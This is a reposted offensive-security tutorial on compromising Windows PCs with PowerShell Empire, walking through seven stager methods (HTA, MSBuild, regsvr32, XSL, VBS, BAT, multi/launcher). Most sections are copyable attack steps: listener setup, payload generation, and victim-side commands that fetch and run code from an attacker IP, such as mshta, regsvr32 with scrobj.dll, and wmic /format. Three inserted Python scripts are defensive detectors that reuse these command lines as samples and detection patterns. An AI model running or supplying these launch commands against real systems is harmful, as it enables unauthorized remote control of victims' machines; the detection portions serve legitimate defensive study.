Nytro

Multiple Ways to Exploiting Windows PC using PowerShell Empire

This is our second post in the article series ‘PowerShell Empire’. In this article we will cover the exploits that lead to Windows compromise with Empire. For our first post in the Empire series, which gives a basic guide to navigating your way through Empire, click here.

Table of contents:

  • Exploiting through HTA
  • Exploiting through MSBuild.exe
  • Exploiting through regsvr32
  • XSL exploit
  • Exploiting through visual basic script
  • BAT exploit
  • Multi_launcher exploit

Exploiting through HTA

This attack exploits Windows through an .hta (HTML Application) file. When an .hta file is run via mshta.exe it executes with the same capabilities as an .exe, which is what lets us get a foothold. To know more about this attack please click here.

To launch Empire, type ‘./empire’.

According to the workflow, firstly we have to create a listener that listens on our local machine. Type the following command:

listeners

After running the above command, it will say “no listeners are currently active”, but don’t worry, we are now in the listener interface. In this listener interface, type:

uselistener http
set Host http://192.168.1.107
execute

Now that a listener is created, type ‘back’ to leave the listener menu and create the stager (our exploit). For this, type:

usestager windows/hta
set Listener http
set OutFile /root/1.hta
execute

Running the above commands creates the .hta file that will serve as our malware. Start a Python web server with the following command so that the .hta file can be fetched:

python -m SimpleHTTPServer 8080

Now that the Python server is up and running, type the following command in the victim’s command prompt to execute our malicious file:

mshta.exe http://192.168.1.107:8080/1.hta

The moment the above command is executed you will have your session. To access the session, type:

interact XDGM6HLE
sysinfo
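Every method in this post stages its payload the same way: a script file is served from a throwaway Python web server and a Windows binary fetches it over plain HTTP. That fetch is visible to a web proxy or egress gateway, which makes it a useful detection point regardless of which stager was used. The following is an added defender-side example, not code from the original article or from the Empire project. It parses a few constructed proxy-log lines (the log format, client addresses and user-agent strings are assumptions) and scores each request on the traits the staging step above exhibits: a script-like extension, a bare IP host, a non-standard port and a non-browser user agent.

```python
"""Proxy-log check for the HTTP staging step used throughout the post.
Added example; the log lines below are constructed, not real traffic."""
import re
from urllib.parse import urlsplit

# Constructed proxy entries (assumed format):
#   <time> <client> <method> <url> <status> "<user-agent>"
# The first, second and last lines mirror the post's staging fetches; the
# two www/cdn lines are ordinary browsing included as negatives.
SAMPLE_LOG = """\
2019-03-01T10:00:01Z 192.168.1.23 GET http://192.168.1.107:8080/1.hta 200 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0)"
2019-03-01T10:00:09Z 192.168.1.23 GET http://192.168.1.107:8080/launcher.sct 200 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0)"
2019-03-01T10:01:00Z 192.168.1.40 GET https://www.example.com/index.html 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/72.0"
2019-03-01T10:01:30Z 192.168.1.40 GET https://cdn.example.com/static/app.xml 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/72.0"
2019-03-01T10:02:00Z 192.168.1.51 GET http://192.168.1.107:8080/launcher.xsl 200 "-"
"""

# Extensions the post's stagers are delivered as (plus .ps1 for completeness).
STAGER_EXT = {".hta", ".sct", ".xsl", ".xml", ".vbs", ".bat", ".ps1"}
LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
BROWSER_MARKERS = ("Chrome/", "Firefox/", "Safari/", "Edg/")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_line(line):
    """Split one log line into a dict; None if it does not match the format."""
    m = LINE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status, ua = m.groups()
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "ua": ua}


def score_fetch(entry):
    """Return (score, reasons). Only script-like extensions are scored at all."""
    u = urlsplit(entry["url"])
    filename = u.path.rsplit("/", 1)[-1]
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    if ext not in STAGER_EXT:
        return 0, []
    reasons = ["script payload %s" % ext]
    if IPV4.match(u.hostname or ""):
        reasons.append("bare IP host")
    if u.port not in (None, 80, 443):
        reasons.append("non-standard port %d" % u.port)
    if not any(mk in entry["ua"] for mk in BROWSER_MARKERS):
        reasons.append("non-browser user agent")
    return len(reasons), reasons


def find_staging(log_text, threshold=3):
    """Return (client, url, reasons) for every fetch scoring at or above threshold."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        score, reasons = score_fetch(entry)
        if score >= threshold:
            alerts.append((entry["client"], entry["url"], reasons))
    return alerts


if __name__ == "__main__":
    for client, url, reasons in find_staging(SAMPLE_LOG):
        print("%s fetched %s: %s" % (client, url, ", ".join(reasons)))
```

The threshold of 3 keeps a CDN-hosted .xml fetched by a browser below the alert line while the three staging fetches score 4 each; tune it against your own proxy data.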

Exploiting through MSBuild.exe

Our next exploit is via MSBuild.exe, which will give you a remote session on Windows using an XML file. To know the details of this attack please click here. To use this exploit, type:

listeners
uselistener http
set Host http://192.168.1.107
execute

This creates a listener. Type ‘back’ to leave the listener menu and create the stager. For this, type:

usestager windows/launcher_xml
set Listener http
execute

Now an .xml file is created in /tmp. Copy this file to the victim’s PC (inside Microsoft.NET\Framework\v4.0.30319\) and run it with the following combination of commands:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml

This way you will have your session. To access the session, type:

interact A8H14C7L
sysinfo

Exploiting through regsvr32

Our next method is exploiting through regsvr32. To know this attack in detail, click here. As always, we have to create a listener first to listen on our local machine. Type the following commands:

listeners
uselistener http
set Host http://192.168.1.107
execute

Now that a listener is created, type ‘back’ to leave the listener menu and create the stager. For this, type:

usestager windows/launcher_sct
set Listener http
execute

This will create a .sct file in /tmp. Serve this file to the victim’s PC using the Python server and then run it from the Run window of the victim’s PC by typing the following command:

regsvr32 /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll

Thus you will have an active session. To access the session, type:

interact <session name>
sysinfo

Exploiting through XSL

XSL (Extensible Stylesheet Language) is a language for formatting and transforming XML data; it is also used to describe how a web server presents XML. Our next method of attack with Empire is exploitation through an .xsl file. For this method, let’s activate our listener first by typing:

listeners
uselistener http
set Host http://192.168.1.107
execute

Now that the listener is up and running, create your exploit:

usestager windows/launcher_xsl
set Listener http
execute

This creates the .xsl file. Now run the Python server from the folder where the .xsl file was created:

cd /tmp
python -m SimpleHTTPServer 8080

Now execute the following command in the command prompt of your victim:

wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

Running the above will give you a session. To access the session, type:

interact <session name>
sysinfo
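The HTA, MSBuild, regsvr32 and XSL methods above all run a signed Windows binary with an argument it would rarely receive in normal use: mshta.exe with a URL, MSBuild.exe with a plain .xml file, regsvr32.exe with /i: and scrobj.dll, and wmic.exe with /format: pointing at a URL. Those command lines are exactly what a process-creation log (Sysmon Event ID 1 or Windows 4688) records, so they are a practical place to detect all four techniques at once. The following is an added example written for this page, not code from the article or from Empire. It runs four simple rules over constructed process-creation events whose command lines mirror the tutorial's own invocations, plus benign counterparts to show the rules stay quiet on an ordinary build, a local DLL registration and a plain WMIC query. The field names and the benign paths are assumptions.

```python
"""Process-creation detection for the LOLBin stager launches used in the
HTA, MSBuild, regsvr32 and XSL sections. Added example; the events below
are constructed to look like Sysmon Event ID 1 / Windows 4688 records."""
import re

# Constructed sample events (assumed field names: Image, CommandLine,
# ParentImage). The first four mirror the post's own commands; the rest
# are benign negatives with assumed paths.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://192.168.1.107:8080/1.hta",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": "MSBuild.exe launcher.xml",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Benign: a normal project build.
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build",
     "ParentImage": r"C:\Program Files\dotnet\dotnet.exe"},
    # Benign: an installer registering a local COM DLL.
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\Program Files\Vendor\component.dll",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
    # Benign: a plain local WMI query.
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic os get caption",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

URL = re.compile(r"https?://", re.IGNORECASE)


def _has_url(cl):
    return URL.search(cl) is not None


def _msbuild_xml_target(cl):
    # MSBuild normally receives .proj/.csproj/.sln; a bare .xml is the
    # inline-task trick from the post.
    return re.search(r"\.xml\b", cl, re.IGNORECASE) is not None


def _regsvr32_scriptlet(cl):
    low = cl.lower()
    return "/i:" in low and "scrobj.dll" in low


def _wmic_remote_format(cl):
    return "/format:" in cl.lower() and _has_url(cl)


# (rule name, expected image basename, predicate over CommandLine)
RULES = [
    ("mshta_remote_hta", "mshta.exe", _has_url),
    ("msbuild_xml_inline_task", "msbuild.exe", _msbuild_xml_target),
    ("regsvr32_scriptlet", "regsvr32.exe", _regsvr32_scriptlet),
    ("wmic_remote_xsl", "wmic.exe", _wmic_remote_format),
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Names of the rules an event matches; an empty list means no alert."""
    image = basename(event.get("Image", ""))
    cl = event.get("CommandLine", "")
    return [name for name, img, pred in RULES if image == img and pred(cl)]


def scan(events):
    """Run every rule over every event; returns (rule, command line) pairs."""
    hits = []
    for ev in events:
        for rule in evaluate(ev):
            hits.append((rule, ev["CommandLine"]))
    return hits


if __name__ == "__main__":
    for rule, cl in scan(SAMPLE_EVENTS):
        print("[%s] %s" % (rule, cl))
```

The rules key on the image basename rather than the full path so that a copy of the binary run from another directory still matches; ParentImage is carried along because a build tool spawned by cmd.exe in a user session is worth weighting differently from one spawned by a build server, which is the natural next refinement.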

Exploiting through Visual Basic script

Our next method is to create a malicious VBS file and exploit our victim through it. Like always, let’s create a listener first.

listeners
uselistener http
set Host http://192.168.1.107
execute

Now, to create our malicious .vbs file, type:

usestager windows/launcher_vbs
set Listener http
execute

The next step is to start the Python server by typing:

python -m SimpleHTTPServer 8080

Once the .vbs file has been served through the Python server and executed on the victim’s PC you will have your session, and just like before, to access the session type:

interact <session name>
sysinfo

Exploiting through .bat

In this method we will exploit through a .bat file. Like our previous exploits, this time too let’s create a listener. For this, type:

listeners
uselistener http
set Host http://192.168.1.107
execute
back

The above commands will create a listener. Let’s create our .bat file using the following commands:

usestager windows/launcher_bat
set Listener http
set OutFile /root/1.bat
execute

The above commands will create a .bat file. Start up the Python server with the following command so you can serve the .bat file to your victim’s PC.

python -m SimpleHTTPServer 8080

Once you run the .bat file, a session will activate. To access the session, type:

interact <session name>
sysinfo

Multi_launcher

This is our last method of this post. It can be used on various platforms such as Windows, Linux, etc. Again, even for this method, create a listener:

listeners
uselistener http
set Host http://192.168.1.107
execute

Then type the following commands to create your malicious file:

usestager multi/launcher
set Listener http
execute

Once you hit enter after the above commands, it will give you a code. Copy this code, paste it in the command prompt of the victim and hit enter. As soon as you hit enter, a session will be activated. To access the session, type:

interact <session name>
sysinfo
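The VBS, BAT and multi/launcher stagers above all end in the same thing: a PowerShell one-liner whose script body is passed through -enc (the -EncodedCommand switch, which takes base64 over UTF-16LE text). That is what the "code" in the last step contains, and it is what command-line auditing or PowerShell logging captures on the victim. The following added example (mine, not from the article or from Empire) decodes such a command line and checks both the wrapper flags and the decoded script for the indicators an analyst looks for first. The sample command line is constructed here with a benign script body so the example runs offline; the launcher flag shape (-noP -sta -w 1 -enc) is an assumption about what the launcher emitted at the time of the post.

```python
"""Triage helper for encoded PowerShell launchers of the kind the VBS, BAT
and multi/launcher stagers run. Added example; the sample command line is
constructed here, not captured from a real agent."""
import base64
import re

# Constructed script body: a download cradle shape with a placeholder URL,
# never executed by this example, only encoded and decoded.
_SAMPLE_SCRIPT = ("$c=New-Object Net.WebClient;"
                  "IEX $c.DownloadString('http://192.168.1.107:8080/stage')")


def encode_powershell(script):
    """-EncodedCommand expects base64 over the UTF-16LE form of the text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Assumed launcher flag shape; only the -enc argument matters for decoding.
SAMPLE_COMMANDLINE = "powershell -noP -sta -w 1 -enc " + encode_powershell(_SAMPLE_SCRIPT)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest first.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)",
                      re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -enc payload, or None when the line has none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    raw = base64.b64decode(m.group(1), validate=True)  # raises on non-base64
    return raw.decode("utf-16-le", errors="replace")


# Indicators checked against both the wrapper flags and the decoded body.
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.IGNORECASE),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.IGNORECASE),
    "no_profile": re.compile(r"-nop\b|-noprofile", re.IGNORECASE),
}


def triage(cmdline):
    """Decode the command line and list which indicators it trips."""
    decoded = decode_encoded_command(cmdline)
    hits = [name for name, rx in INDICATORS.items()
            if rx.search(cmdline) or (decoded is not None and rx.search(decoded))]
    return {"decoded": decoded,
            "indicators": hits,
            "verdict": "suspicious" if len(hits) >= 2 else "review"}


if __name__ == "__main__":
    result = triage(SAMPLE_COMMANDLINE)
    print("decoded :", result["decoded"])
    print("hits    :", ", ".join(result["indicators"]))
    print("verdict :", result["verdict"])
```

Decoding is the step that matters: the base64 blob hides every one of the body indicators from a plain string match, while the wrapper flags (-noP, -w 1) are visible without it, which is why both are scored.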

Conclusion

The above were the methods that you can use to exploit windows using different vulnerabilities. Using this framework is an addition to your pentesting skills after Metasploit. Enjoy!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.

Source: https://www.hackingarticles.in/multiple-ways-to-exploiting-windows-pc-using-powershell-empire/
